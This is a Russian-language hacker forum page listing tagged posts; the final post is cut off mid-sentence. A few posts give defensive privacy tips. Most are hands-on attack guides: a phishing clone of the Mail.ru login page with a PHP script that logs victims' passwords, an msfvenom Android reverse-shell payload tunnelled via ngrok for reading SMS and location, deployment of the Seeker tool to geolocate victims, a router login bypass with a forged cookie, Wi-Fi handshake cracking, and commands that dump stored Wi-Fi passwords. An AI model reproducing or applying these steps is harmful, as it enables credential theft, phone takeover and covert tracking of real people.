Jump to content
Новости и объявления.
  • Уважаемые гости. При посещении нашего сайта, просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.д. Рекомендуем посетить разделы: "Общение, Коммерческий раздел, Услуги Хакеров и статьи, Отзывы о сайте и пользователях, Черный список" и другие разделы нашего сайта. ***ВНИМАНИЕ*** При обращении за помощью, просим быть внимательными, на сайте есть, как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант сервиса. XAKERSAY.COM
  • Взлом
  • Взлом
  • Гарант-сервис
  • Реклама на форуме

Search the Community

Showing results for tags 'сеть'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • XAKERSAY
    • Hacker Forum news.
    • Transactions are the guarantor of the service.
    • A section for resolving controversial issues.
  • Общение.
    • A section for resolving controversial issues.
    • A section for resolving controversial issues.
  • Коммерческий раздел.
    • A trading platform on a hacker site.
    • Services related to communication, telephony, number substitution, etc.
    • Promotion, promotion, SEO, etc.
    • Sale-Purchase Of Cryptocurrencies.
  • Практика взлома, информация и т.д
    • Web vulnerability.
    • Social network
    • E-Mail (Mail).
    • Malware.
    • Soft Hacker
    • Freebie (I'll give it away for free).
    • Help with various software problems and computer problems.
  • Безопасность.
    • Help with malware infection.
    • Punishment for hacking.
    • Secure connection with IP address substitution and security articles.
  • XAKER (Hacker Services and articles).
    • Services of professional hackers (HACKING SERVICES)
    • Hacking services (REFUSED VERIFICATION).
    • About professional hackers (ARTICLES AND STORIES).
    • Requests for help.
  • Other topics, miscellaneous.
    • Reviews of hackers/programmers who helped you.
    • Reviews about our site and suggestions to change your opinion.
    • Reviews of third-party resources.
  • Реклама на форуме.
    • Advertising on the forum.
  • Черный список. (BLACK LIST).
    • BLACKLIST. Scammers and would-be hackers.
    • What methods scammers use to deceive users (Articles).
  • Разное.
    • Other topics, miscellaneous.
    • Other topics, miscellaneous.

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Сайт


ICQ


Yahoo


Skype


Город


Интересы

  1. Приветствую, хакеры! В данной статье я расскажу вам о том, как отследить какие приложения используют интернет-трафик. Если вас беспокоит ограниченный тарифный план сотового оператора, когда у вас нет доступа к Wi-Fi, или вы хотите убедиться, что определенные приложения не отсылают данные обратно на свои сервера, когда они этого делать не должны – воспользуйтесь приложением GlassWire для Android. Приложение GlassWire тщательно отслеживает использование данных другими приложениями – вы можете видеть, какие приложения на вашем смартфоне используют больше всего интернета (загружая и отправляя данные), можете получать немедленные предупреждения, когда новое приложение начинает связываться с интернетом, и многое другое. Для этого на главной странице приложения необходимо выбрать типсети и период, за который будут отображаться данные о расходе трафика. Если какие-то программы используют соединение в данный момент, это будет отображаться соответствующими иконками. Помимо этого, вы можете установить собственный лимит расхода интернет-трафика. В таком случае приложение будет уведомлять вас, если вы его превысите. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  2. Приветствую, хакеры! Вы наверняка знаете, что у незапароленных точек доступа, особенно в общественных местах, очень слабая защита. Поэтому они так часто подвержены атакам хакеров. Даже хороший брандмауэр не спасёт. Так вы можете не заметить, что подключились к какой-то сети и передаёте личную информацию злоумышленникам. Более того: мошенники создают поблизости фальшивые точки Wi-Fi. Если у вас включено автоподключение к Wi-Fi, обязательно отключите это — так вы не станете жертвой хакеров. Ещё установите детектор безопасных Wi-Fi точек. Например, Mobile Security от Avast (https://www.avast.com/wifi-finder). Он в удобном виде показывает самые безопасные сети вокруг. Ещё совет для параноиков: заходите на сайты только с защищённым протоколом HTTPS. В конце концов, подключайтесь к сети и сёрфите через VPN. Если вы всё же хотите оставить функцию автоподключения, ведь это удобно, всегда проверяйте, к какой точке доступа вы подключились. Если она требует регистрации по номеру телефона — безопасность повышается в разы. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации
  3. Сегодня поговорим о знакомом скрипте под названием "Seeker", созданный для поиска местоположения человека посредством перехода по ссылке. Также используется ngrok. Seeker использует HTML5, Javascript, JQuery и PHP для захвата информации об устройстве и геолокации с высокой точностью. Точность полученной информации - около 30 метров. На iPhone по какой-то причине точность местоположения составляет около 65 метров. Он размещает поддельный веб-сайт на Apache Server и использует Ngrok , которая запрашивает разрешение на размещение, и если пользователь ее разрешает, то мы получаем следующие данные: Долгота.Широта.Точность.Высота - не всегда доступна.Направление - доступно только в том случае, если пользователь движется.Скорость - доступна только в том случае, если пользователь движется.Наряду с информацией о местоположении мы также можем получить информацию об устройстве без каких-либо разрешений: Операционная система.Платформа.Количество ядер процессора.Объем оперативной памяти - приблизительные результаты.Разрешение экрана.Информация о GPU.Имя и версия браузера.Открытый IP-адресКод: Установка и запуск. git clone https://github.com/thewhiteh4t/seeker.git cd seeker/ chmod 777 install.sh ./install.sh Код: Запуск - python seeker.py Жертва переходит по сгенерированной ссылке и разрешает доступ к геолокации, после чего мы видим его местоположение. Сразу можно открыть google map. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  4. Начнем с создания клона сайта: Вид сайта задаёт html, а интерактивные элементы на странице управляются JavaScript. Так же в коде сайта могут быть ссылки на сторонние ресурсы, такие как картинки, аудио файлы и т.п. Поэтому для создания копии не достаточно просто скопировать весь код страницы, надо перенести так же и сторонние ресурсы или переправить ссылки на них. Помимо этого нам нужно изменить логику работы приложения, чтобы данные отправлялись к нам на сервер и сохранялись там. Для примера попробуем создать реплику сайта страницы авторизации Mail. Её адрес https://account.mail.ru/login, чтобы нам просмотреть исходный код страницы в firefox достаточно нажать комбинацию клавиш Ctrl+U. Но нам не надо вручную всё копировать и сохранять все картинки: в Linux есть более простое решение. В консоли вводим команду wget --page-requisites --convert-links https://account.mail.ru/login После этого у нас в папке, где была открыта консоль, появится папка account.mail.ru в которой будет файл login. Если открыть его в браузере, то мы увидим, то же, что и на странице входа mail. Теперь надо создать сервер на котором будет храниться данная страница. Для теста создадим его локально, но процесс настройки на реальном сервере будет практически таким же. Убеждаемся, что web сервер работает. Для этого надо в браузере перейти на страницу http://127.0.0.1/ Если ничего не отобразилось, надо перезапустить веб-сервер 2 командами: source /etc/apache2/envvars systemctl restart apache2 После того как приветственная страница отображается, нужно скопировать в папку сервера скачанные wget'ом файлы. Для этого переходим в /var/www/html/ и переносим туда ранее скачанный файл login. Теперь переходим в браузере по адресу login и нам отображается страница авторизации, то храниться она уже на нашем сервере. Теперь надо реализовать функцию сохранения паролей, для этого надо в текстовом редакторе открыть файл login и найти там страницу, на которую отправляются данные пользователя(за это отвечает параметр action). Для этого нажимаем ctrl+F и набираем action="https://auth.mail.ru/cgi-bin/auth" Меняем найденный текст на action="auth.php". Затем в папке с login создаём новый файл auth.php. Открываем его текстовым редактором и пишем туда: <?php file_put_contents('log/login_log.txt', "Username: ".$_POST['Username']." Password: ".$_POST['Password'].'\n', FILE_APPEND); ?> Пояснение file_put_contents - функция для записи данных в файл, log/login_log.txt - путь к файлу. $_POST['Username'] - имя пользователя из формы, а $_POST['Password'] пароль. FILE_APPEND указывает, что файл не надо каждый раз перезаписывать, а новые данные добавляются в конец. Теперь надо создать папку, куда будут сохраняться данные. Для этого в папке в login надо в пустом месте кликнуть правой кнопкой мыши и выбрать Open in terminal. В появившимся окне вводим: mkdir log chmod 777 log Всё, теперь введённый в форму логин и пароль сохраняться у нас на сервере. А чтобы жертва ничего не заподозрила перенаправляем её на сайт mail с ошибкой входа. Для этого в auth.php перед ?> добавим строку и впишем туда: header('Location: https://account.mail.ru/login?fail=1'); В общем ничего сложного и все уже готово. Пробуем зайти на http://127.0.0.1/login и ввести туда логин и пароль. Нас перенаправит на реальный сайт mail с ошибкой входа, а данные, которые ввёл пользователь, сохраняться в файле /var/www/html/log/login_log.txt Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  5. I2P — анонимная зашифрованная сеть. Она была представлена в 2003 сообществом разработчиков, выступающих за сетевую безопасность и анонимность. По типу реализации является оверлейной сетью и находится на 6 уровне модели OSI. I2P написан на Java. Это средство, которое позволяет чувствовать тебя безнаказанным по отношению к копирастам, спецслужбам и прочим субъектам чуть более чем полностью. Дьявольская машина, которая как и подобает любой анонимной сети, I2P децентрализована. В сети нет DNS, вместо них используют так называемые адресные книги, которые, подобно торренту. У i2p так называемое доменное имя - .i2p. Вместо IP-адресов во всей сети используются открытые криптографические ключи, не имеющие абсолютно никакой логической связи с реальными компьютерами. Свой открытый криптографический ключ можно даже отослать заказным письмом всем копирастам так как даже зная эти ключи, невозможно определить местоположение не только пользователей, но и серверов. ВООБЩЕ. Именно поэтому I2P нельзя отключить, отфильтровать или заблокировать. Она способна работать, даже если в сети останется всего 3,5 анонимуса. Сеть проектировалась с расчетом на то, что каждый компьютер в ней принадлежит копирастам и следит за вами, поэтому для противодействия был введен ряд активных мер (например, таких как: Чесночная маршрутизация, многослойное шифрование, односторонние туннели, расхождение шифрованных пакетов по нескольким разным туннелям и так далее). Для дополнительной защиты каждый пакет шифруется по самое нехочу. В каждый пакет дописывается рандомное количество рандомных байт, после чего пакет подвергается сквозному, чесночному, туннельному, а также шифрованию транспортного уровня с использованием over 9000 алгоритмов. Также время существования тоннеля десять минут. Узел не участвует в тоннеле дважды. Для построения тоннеля каждый раз выбирается новая последовательность узлов. 256 бит AES усиленный режим CBC с PKCS#5; 2048 бит Схема Эль-Гамаля; 1024 бит DSA; 2048 бит Алгоритм Диффи — Хеллмана; 256 бит HMAC — алгоритм проверки целостности сообщений; Хэширование SHA256.Также для особых параноиков был написан клиент на C++ под названием i2pd.
  6. В интернет поисковиках Google или Яндексе все ваши запросы анализируются, сохраняются и обрабатываются, затем все эти данные прогоняются через нейросети, выявляют необычные запросы и криминал, потом к процессу подключаются злые дядьки в погонах, а дальше вы уже знаете. Но есть поисковики, которые не хранят вашу активность, поэтому давайте разберемся какие поисковики использовать для того, чтобы оставаться анонимным. Поехали! №1. Поисковая система DuckDuckGo DuckDuckGo DuckDuckGo позиционирует себя как поисковую систему, которая ставит на первое место конфиденциальность пользовательской информации. Она не хранит IP-адреса, не ведёт логи пользовательской информации. Возможности: Есть приложения для Android и IosШифрование sslНе сохраняет историю поиска ( ip адреса и конфиндициальные данные )Система распознования опечаткиОтключение показа рекламыНе сохраняет идентификатор пользователя в CookiesНе передает данные третьим лицамПолезные функции: Генератор паролей и кодовой фразы: Устанавливаем длину пароля ( 10 символов ); password 10 Генерируем кодовую фразу; random passphrase IP-адреса, URL, DNS-записи и валидация почтовых адресов Наверное, простейший запрос к DDG будет выглядеть так: ip Он выводит на экран твой IP, местоположение и даже почтовый индекс. Простая информация, ради которой не надо ходить на сторонние сайты. Более сложный запрос: dns records yandex.ru Он покажет DNS-записи, которые относятся к домену xakep.ru. Просто и со вкусом. При желании yandex.ru можно и пингануть: is yandex.ru down И это не полный список полезных команд. Более подробно обо всех фишках можно почитать на их сайте. №2. Поисковая система ixquick Ixquick.com стал первой поисковой системой, удалившей конфиденциальные данных своих пользователей. Ixquick также не распространяет персональную информацию своих пользователей с другими поисковыми системами или с провайдером их спонсированных результатов.Не записывает IP-адреса посетителей, удаляет информацию, идентифицирующую информацию из пользовательских поисковых запросов и отправляет информацию в Google анонимно. Startpage также включает бесплатный анонимный веб-прокси, который может открывать веб-сайты, используя их прокси сервис, и анонимно искать картинки и видео. Возможности: Шифрование sslСервера находятся в НидерландахЕсть приложения для iOS и AndroidНе сохраняет историю поиска ( ip адреса и конфиндициальные данные )Не передает данные третьим лицамНе сохраняет идентификатор пользователя в Cookies Надежная поисковая анонимная система - это ещё один инструмент, который необходим для того, чтобы оставаться анонимным в сети. Надеюсь, что эти поисковики вам пригодятся, поэтому буду благодарен, если поделитесь этой статьей со своими друзьями и сделаете репост.
  7. Взлом роутера обычно является либо самой простой, либо самой сложной задачей - его сложность варьируется от ввода имени пользователя и пароля по умолчанию, и ты максимально заебёшься, пытаясь попасть внутрь роутера по telnet или ssh. В обоих этих случаях перебор паролей не очень полезен, но это довольно простой метод, мы ведь не ищем лёгких путей, да? Однако я скажу тебе следующее: Это все еще роутер, который я использовал в своей домашней сети, потому что он предоставляется моим интернет-провайдером, и поскольку он является одним из основных поставщиков в моей области, многие люди страдают от этих уязвимостей. Ну ладно, теперь к делу. ЭТАП I. НАЙДИ IP РОУТЕРА. Так как это самый простой шаг, и есть бесчисленное множество способов сделать это, я просто приведу несколько различных возможностей: Проверка сетевых настроек с помощью панелей настроек ОСИспользование ipconfig в Windows и ifconfig на машинах Unix из терминалаИспользование Fuzzer в качестве инструмента обнаружения цели.Найденный мной IP роутера - 192.168.0.1 ЭТАП II. СОБЕРИ ТРАФФИК. Я решил, что хороший способ начать, будет исследовать веб-сервер роутера для чего-то за пределами того, что видно невооружённым глазом. По этой причине я использовал HTTPView и проанализировал трафик от первой попытки входа в систему. Чтобы помочь себе, я применил некоторые фильтры, чтобы избавиться от медиа и стилей ответов с сервера. Вот результат, который я добыл: Этой информации нам хватит. ЭТАП III. ПРОАНАЛИЗИРУЙ ТРАФФИК И НАЙДИ УЯЗВИМОСТИ. Теперь, когда у нас есть нужное количество данных, мы должны проанализировать его, чтобы увидеть, наткнулись ли мы на что-то интересное. Сразу можно игнорировать все файлы jQuery, а также языковые файлы или, по крайней мере, не начинать поиск оттуда. Поскольку я работаю в Chrome, я не могу анализировать ответы прямо из HTTPView, поэтому мне нужно реплицировать запрос в Rest и выполнять там анализ. Есть этот интересная штука, которую я нашел в /menu.html Присмотрись хорошенько. Хотя определение функции readCookie отсутствует, можно с уверенностью предположить, что она считывает файл cookie, а userData-это имя этого файла cookie. Из строки 247 мы можем сделать вывод, что значение этого файла cookie должно быть root. Чтобы изменить куки, я использовал расширение EditThisCookie и добавил файл куки с уже упомянутым именем и значением и вуаля, мы внутри.. Всё так просто? ЭТАП IV. ПРОСКАНИРУЙ РОУТЕР НА НАЛИЧИЕ ДРУГИХ ROOT'ОВ. Если мы попытаемся перемещаться в любом месте, мы встретим тот же экран входа в систему. Есть что-то еще, необходимое для изменения настроек роутера. Однако, у нас есть доступ к гораздо большему количеству страниц, поэтому я думаю, что стоит сделать сканирование на маршрутизаторе. Для этого я буду использовать сканер с уже установленным файлом cookie userData=root. В addiotion я включу опцию "направленное сканирование" на вкладке второго пилота, чтобы сканер полагался на мои действия в качестве ввода. После запуска сканера перейдите к 5-10 страницам на маршрутизаторе, которые требуют входа в систему, например /basicSetup.html и / или basicDHCP.html и пусть инструмент делает свою работу. После того, как траффик перестал поступать, мы можем проанализировать результаты для интересных выводов. Для этого я предпочитаю сортировать результаты по пути, чтобы убедиться, что я не пропустил ни одного важного файла или каталога. И через некоторое время я столкнулся с этим: ЭТАП V. ПОЛУЧИ ПОЛНЫЙ КОНТРОЛЬ. DocsisConfigFile.xml - это обычно файл, который содержит кучу полезной информации о конфигурации маршрутизатора, посмотрим, что внутри: Да, всё так просто. Это определенно работает - файд содержит много интересной информации, включая имя пользователя и пароль в обычном тексте, благодаря которым мы и получили полный доступ. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  8. Привет, хакеры, в данной статье поговорим о ngrok и metasploit и способы взлома телефона и получения удаленного доступа к смартфону, используя эти программы. Первым делом переходим на официальный сайт ngrok и создаем аккаунт. Скачивает и устанавливаем инструмент. Ссылка - https://ngrok.com/download Перемещаем иконку запуска на рабочий стол для удобства, запускаем и прописываем следующую строчку: ngrok-stable-linux-amd64.zip После прописываем: ./ngrok authtoken В терминале пишем: ./ngrok tcp 4444 Не забывайте, если вы имеете белый адрес, то данные пункты можно пропустить и даже не использовать Ngrok. Следующим этапом является полноценное создание Payload’а для смартфона. Чтобы создать его будем использовать msfvenom, поэтому используя новую консоль прописываем в ней: msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=10612 R > payload.apk Если ngrok вы не использовали, то поле LHOST прописываешь собственный ип-адрес, а в LPORT прописываем 4444. Отлично, payload подготовлен, теперь необходимо передать его нашей жертве. Далее необходимо узнать ip-адрес, используя Kali Linux пишем – “ipconfig”, если у вас установлен Arch, то прописываем “ip a”. Теперь атаку будет производить metasploit, если используете кали, то установке не требуется, он предустановлен. Для запуска прописываем в консоле: msfconsole. И пишем: msfconsole use exploit/multi/handler set PAYLOAD android/meterpreter/reverse_tcp set LHOST localhost set LPORT 4444 exploit Когда жертва откроет payload мы сразу же увидим открытую сессию. С этого момента получаем удаленный доступ к телефону жертвы. Для нахождения местоположения необходимо написать: geolocate Также можно скопировать все смс-сообщения при помощи команды: sms_dump Используя подобную незамысловатую схему, вы можете легко получать доступ к чужим смартфонами и работать с инструментами, чтобы использовать полученную информацию. Я никого ни к чему не призываю, статья написана в ознакомительных целях!
  9. Сегодня мы будем работать с таким сканером веб-серверов как Nikto. У меня Parrot OS со встроенным Nikto, но вам придётся скачивать, если у вас обычный Линукс. С помощью него вы способны проверить сервера на ошибки, неверные настройки, дефолтные файлы и на уязвимости. Скажу сразу, что Nikto не создавался быть незаметным и его активность останется в логах сервера и попадёт в поле зрения IPS/IDS(система обнаружения и предотвращения вторжений). Советую работать через прокси. Обновляем пакеты ОС и клонируем репозиторий с GitHub'а: sudo apt update git clone https://github.com/sullo/nikto.git Всегда перед использованием обновляйте Nikto: nikto -ubdate nikto -update Тут нам представили некоторые аргументы к командам. Сегодня мы их тоже разберём. Плюс(+) значит требуется значение. То же самое вы увидите в результате аргумента "-h"(-help) И так, заходим в директорию и введём первые команды: cd nikto nikto -host www.CyberCat.uz Тут нам нужно указать хост сайта(IP или домен). Если вы хотите указать свой порт, то добавляете его "-p"(-port): nikto -host www.CyberCat.uz -p 443 Если вы вводите IP адрес, то порт можно указать так: 111.111.11.11:443 Или перечислением: nikto -host www.CyberCat.uz -p 88,443,80 также можно указать диапазон: - p 80-90 Вы можете ещё указать несколько хостов для сканирования на одну сессию nikto. Для этого вам нужно создать текстовой файл с прописанными хостами внутри и вызвать его в команде с указанием полного пути. Хосты должны быть перечислены на каждой строке. Чтобы сохранить отчёт о сканировании, нужно под аргументом "-o"(-output) указать куда кидать отчёт и выбрать формат под аргументом "-Format": nikto -host www.CyberCat.uz -o ~/CyberCatTest.html -Format htm Форматы могут быть следующие: html, csv, txt, sql, nbe, xml. Если формат не указан, то он будет взят из расширения файла с аргументом "-о" Nikto сначала начинает скан через HTTP и если он замечает SSL сертификат,он переходит на HTTPS. Если вы точно знаете что сайт имеет SSL, вы можете сразу начать скан через HTTPS с помощью аргумента "-ssl", дабы сохранить время. А аргумент "-nossl" отключает использование ssl Аргумент "-Tuning+": 1 Интересные файлы/Увиденные в логах 2 Неправильно настроенные/Дефолтные файлы 3 Раскрытие информации 4 Инъекция (XSS/Script/HTML) 5 Удалённое извлечение файлов — Внутри корня веб 6 Отказ в обслуживании 7 Удалённое извлечение файлов — По всему серверу 8 Выполнение команд/Удалённый шелл 9 SQL-инъекция 0 Выгрузка файлов a Обход аутентификации b Идентификация программного обеспечения c Удалённое внедрение кода d Веб-служба e Административная консоль x Обратное значение опций настройки т. е. включить всё, кроме указанного) Один из примеров вывода со значением Tuning. Тут я проверил наличие уязвимостей на инъекции (XSS/Script/HTML) По дефолту запросы отправляются каждые 10 секунд, а с аргументом "-timeout+" вы сможете сами обозначить тот самый таймаут. Как я сказал в начале, активность вашего скана будет замечена в логах,поэтому вам лучше использовать прокси. Это может быть любой ваш прокси или что-то, что обеспечивает вам какую-то анонимность. Также вы можете работать через прокси прямо в консоли введя аргумент "-useproxy" и Аргумент "-Display+" позволяет включить или отключить отображение вывода: 1 Показать редиректы 2 Показать полученные кукиз 3 Показать все ответы 200/OK 4 Показать URL, которые требуют аутентификацию D Отладочный вывод E Отобразить все HTTP ошибки P Печатать прогресс в STDOUT (стандартный вывод) S Собрать из вывода IP и имена хостов V Вербальный вывод Также, если вы добавите аргумент "-dbcheck", то база данных проверится на ошибки синтаксиса. "-404code" позволяет игнорировать HTTP коды. Формат: 302,301Аргумент "-id+" позволяет использовать аутентификацию на хосте, формат id:pass или id:pass:realm "-mutate+" Предположить дополнительные имена файлов: 1 Проверить все файлы по всем корневым директориям 2 Предположить имена файлов с паролями 3 Перечислить имена пользователей через Apache (запросы вида /~user) 4 Перечислить имена пользователя через cgiwrap (запросы типа /cgi-bin/cgiwrap/~user) 5 Попытаться брут-форсить имена субдоменов, предположить, что имя хоста является родительским доменом 6 Попытаться угадать имена директорий из вашего словаря Я никого ни к чему не призываю, статья написана в ознакомительных целях!
  10. Привет, хакеры, в данной статье покажу способ взлома Wi-Fi. Это самый простой способ. Есть 2 версии wifite, использовать будем вторую — Wifite2 Работать будем на Kali Linux. Помимо Кали необходим Wi-Fi адаптер. Некоторые Wi-Fi адаптеры могут не подходить и придётся использовать два адаптера. Как в моём случае(TP-Link 722). Если 2 адаптера, программа может спросить какой выбрать. Выбираете адаптер для сканирования сетей. Скачиваем wifite2: git clone https://github.com/derv82/wifite2.git Заходим в директорию: cd wifite2 И запускаем: ./Wifite.py Начался мониторинг сетей. Когда появиться сеть, останавливаете мониторинг (ctrl + c) Выбираете свою сеть обозначив номер 1 сети или выбрав сети от и до. Например: 2 или 2-5. Начинается захват хэндшейка. Мы выкидываем какого-то пользователя с его сети(да,теперь вы видели всё) при попытке переподключиться он обязан ввести пароль. А сессия останавливается и этот пароль сохраняется в текстовом файле. Выводы: если вы отключились от своей точки, задумайтесь. И старайтесь сократить дальность wifi до минимума, не заходя за стены. Взлом чего-либо — незаконно. Я никого ни к чему не призываю, статья написана в ознакомительных целях!
  11. Привет, хакеры, продолжаем тему узнавания паролей от беспроводных сетей. В данной статье будет рассказано про способы получения подобной информации на Linux. Как узнать пароль от WiFi на Linux Для подключения к беспроводной сети в Linux Используется либо Network Manager либо WPA Supplicant. Первое является программой с собственным граф. Интерфейсом, а второе подключает компьютер к беспроводной сети, используя стандартную консоль. Оба инструмента сохраняет все настройки в открытую. Однако перед освоением команд, необходимо воспользоваться граф. Интерфейсом, необходимо это для получения информации об подключениях компьютера к различным сетям. Нажимаем на значок беспроводной сети возле часов и тыкаем “Сетевые соединения”. Отлично, видно сети к которым компьютер подключался и подключен прямо сейчас. Для получения пароля берем одну из сетей и нажимаем на ней “Изменить”. После нажимаем на вкладку “Защита Wi-Fi”, где отмечаем пункт “Показывать пароль” Для выполнения данной функции не требуется пароль администратора, то есть выполняется любым пользователем. Ранее оговаривалось, что программа сохраняет все данные в открытом виде: В папке /etc/NetworkManager/system-connections/. Просмотреть файлы ls -l /etc/NetworkManager/system-connections/ Для просмотра названий и паролей вводим: sudo egrep -h -s -A 9 --color -T 'ssid=' /etc/NetworkManager/system-connections/* Вторая программа, использующая командную строку, для проверки подключений хранит всю свою информацию по адресу - /etc/wpa_supplicant.conf. Однако запустить программу можно и при помощи ключа, который указан после файла с неизвестным названием и положением. В случае автоматический загрузки данной программы, есть возможность изучения файла - /etc/rc.local на наличие команды, которая поможет в поиски настроек беспроводной сети. Данный файл можно найти, взглянув на статус службы: systemctl status wpa_supplicant.service В случае ручного запуска программы, поиск осуществляется в данных категориях: grep supplicant ~/.bash_history Просмотр содержимого папки программы: ls -l /etc/wpa_supplicant/ Код для вывода содержимого файла: cat /etc/wpa_supplicant/wpa_supplicant.conf
  12. Привет, хакеры, может произойти такая ситуация, что будет утерян пароль от беспроводной сети, к которой подключен пользователь, возможно просто хотите узнать к каким сетям компьютер был подключен раньше. В данной и следующей статье я расскажу, как проверить эти данные для Windows и Linux соответственно. Данная инструкция предназначена для Windows. Как узнать пароли WiFi Узнать пароль от сети, к которой подключен компьютер пользователя в момент проверки, можно при помощи графического интерфейса. Для этого переходим в “Центр управления сетями и общим доступом”. Далее кликаем на название сети, скриншот: Появляется новое окошко, тыкаем “Свойства беспроводной сети”, после чего нажимаем на вкладку “Безопасность” и отмечаем пункт “Отображать вводимые знаки” Теперь о том, как проверить к каким сетям компьютер был подключен ранее и какие использовал при этом пароли. Рассмотри несколько способов. Первый заключается в использовании консоли Windows, а второй в использовании специального ПО. Начнем с первого варианта и откроем консоль при помощи сочетании клавиш “Win + R” и напишем команду “cmd”, теперь можно пользоваться командной строкой. Чтобы просмотреть возможные профили, необходимо прописать: netsh wlan show profile Идем дальше, для просмотра паролей всех сетей: netsh wlan show profile name=* key=clear Для просмотра пароля определенной сети: netsh wlan show profile name="имя_сети" key=clear Заменяем настоящее имя сети на необходимое, к примеру: netsh wlan show profile name="dlink" key=clear В данном примере просматривается 4 профиля и их пароли. Но данный компьютер подключался к большему количеству беспроводных сетей. Для этого используется второй способ со специальным программным обеспечением, а именно программа – WirelessKeyView. Программа с закрытым исходным ходом, однако все равно является абсолютно бесплатной. Никаких особых вещей рассказывать про инструмент не нужно, здесь все интуитивно понятно. Здесь видим все сети и пароли, к которым был подключен компьютер. В следующей статье ждите информацию по Linux.
  13. Привет, сегодня расскажу, как взломать роутер вашего неприятеля. Взлом роутера обычно является либо самой простой, либо самой сложной задачей - его сложность варьируется от ввода имени пользователя и пароля по умолчанию, пытаясь попасть внутрь роутера по telnet или ssh. В обоих этих случаях перебор паролей не очень полезен, но это довольно простой метод. Я собираюсь использовать роутер CBN CH6640E. Хорошенько погуглив, вы поймете, что он не новый, был выпущен в 2011 году, а также есть целый пост в exploit-db.com об этом говорит многое). Но скажу следующее: Это роутер, который используется в домашних сетях, потому что он предоставляется многими интернет-провайдерами, поэтому многие люди страдают от этих уязвимостей. Ну ладно, теперь к делу. ЭТАП I. НАЙДИ IP РОУТЕРА. Т.к данный шаг самый простой, и имеется множество способов сделать это, то просто приведу несколько различных возможностей: Проверка сетевых настроек с помощью панелей настроек ОС Использование ipconfig в Windows и ifconfig на машинах Unix из терминала Использование Fuzzer в качестве инструмента обнаружения цели. Найденный IP роутера - 192.168.0.1 ЭТАП II. СОБЕРИ ТРАФИК. Хороший способ начать, будет исследовать веб-сервер роутера для чего-то за пределами того, что видно невооружённым глазом. Используем HTTPView и анализируем трафик от первой попытки входа в систему. Чтобы облегчить задачу, применяем некоторые фильтры, избавляясь от медиа и стилей ответов с сервера. ЭТАП III. ПРОАНАЛИЗИРУЙ ТРАФИК И НАЙДИ УЯЗВИМОСТИ. Теперь, когда имеем нужное количиство данных, мы должны проанализировать его, чтобы увидеть, найдена ли интересная информация. Сразу можно игнорировать все файлы jQuery, а также языковые файлы или, не начинать поиск оттуда. Т.к работа идет в Chrome, нет возможности анализировать ответы прямо из HTTPView, поэтому нужно реплицировать запрос в Rest и выполнять там анализ. Имеется интересная штука, найденная здесь - /menu.html Присмотритесь хорошенько. Определение функции readCookie отсутствует, можно с уверенностью предположить, что она считывает файл cookie, а userData-это имя этого файла cookie. Из строки 247 можно понять, что значение данного файла cookie должно быть root. Чтобы изменить куки, используем расширение EditThisCookie и добавляем файл куки с упомянутым именем и значением. ЭТАП IV. ПРОСКАНИРУЙ РОУТЕР НА НАЛИЧИЕ ДРУГИХ ROOT'ОВ. Делая попытки перемещаться в любом месте, мы встретим экран входа в систему. Нужно что-то, необходимое для изменения настроек роутера. У нас есть доступ к гораздо большему количеству страниц, поэтому, стоит сделать сканирование на маршрутизаторе. Поэтому используем сканер с установленным файлом cookie userData=root. В addiotion, включу опцию "направленное сканирование" на вкладке второго пилота, чтобы сканер полагался на наши действия в качестве ввода. После запуска сканера перейдите к 5-10 страницам на маршрутизаторе, которые требуют входа в систему, например /basicSetup.html и / или basicDHCP.html и пусть инструмент делает свою работу. Когда траффик перестал поступать, начинаем анализировать результаты для интересных выводов. Рекомендую сортировать результаты по пути, чтобы убедиться, что не пропущено ни одного важного файла или каталога. ЭТАП V. ПОЛУЧИ ПОЛНЫЙ КОНТРОЛЬ. DocsisConfigFile.xml - файл, который содержит кучу полезной информации о конфигурации маршрутизатора, посмотрим внутренности. Это определенно работает - файл содержит много интересной информации, включая имя пользователя и пароль в обычном тексте, благодаря которым получен полный доступ. Заключение. Даже каких-либо 0day экплоитов нам не понадобилось, чтобы получить полный контроль над роутером.. Сразу предупреждаю, что написана статья лишь для ознакомления и предназначена для вашей же безопасности.
  14. Ежедневно хакерские инструменты обновляются и пополняются, поэтому будет преступление, не рассказать о инструменте Silent Trinity. Что это и зачем необходимо Профессионалы из PT ESC прибавляют знаний в продукцию компании, обучают обнаружению tactics, techniques и procedures атак. Значит очень важно будет рассказать о весьма многофункциональном инструменте – Silent Trinity. Более того, эти же эксперты уже выявлены случаи применения данного инструментария. Framework post exploitation данного инструмента обновился до версии 0.3.0. Главные особенности обновления - это его архитектура и онлайн режим. Взломщикам нравится framework, из-за использования DLR-имплантов. Огромная гибкость и анонимность получает инструмент от DLR-имплантов, если сравнивать с C Sharp. В данный момент общение с пользователем осуществляется через 4 различные транспортировки – HTTP, HTTPS, DNS, WMI Принцип работы нового Silent Trinity Silent Trinity был многократно исследован, для получения способов его обнаружения, вывод не утешительный. Как минимум инструментарий обнаруживается как на хосте, так и во время сетевой взаимосвязи. Взглянем на второй способ обнаружения. Стандартный при этом метод транспортировки – HTTPS. Запускаясь первый раз, создается поддельный сертификат, который помогает взаимодействовать с системой. Данный сертификат всегда одинаков. Необычность сертификата также является срок его действия в 9999 дней. DLR-имплант способен стартануть с помощью powershell, msbuild и даже wmic. Появляется файл, запускающийся благодаря одной из программ. Неважно какой способ запуска мы выберем, внутри файла всегда будет присутствовать объект формы Base64. Он помогает доставлять запросы, для создания полезной нагрузки, чтобы была возможность транспортировки. Пользователь получает ее и делает необходимые манипуляции. Данный метод при использовании DLR-имплантов довольно сложно выявить, но есть варианты вычисления трассировки событий с помощью event tracing for windows. Это помогает нам увидеть использование языка Boo, именно на нем написаны все импланты программы и ее модули. Это 